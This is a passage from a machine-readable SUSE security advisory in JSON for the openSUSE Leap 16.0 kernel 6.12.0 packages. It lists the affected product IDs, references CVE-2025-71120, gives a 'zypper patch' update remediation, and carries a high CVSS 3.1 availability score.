"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
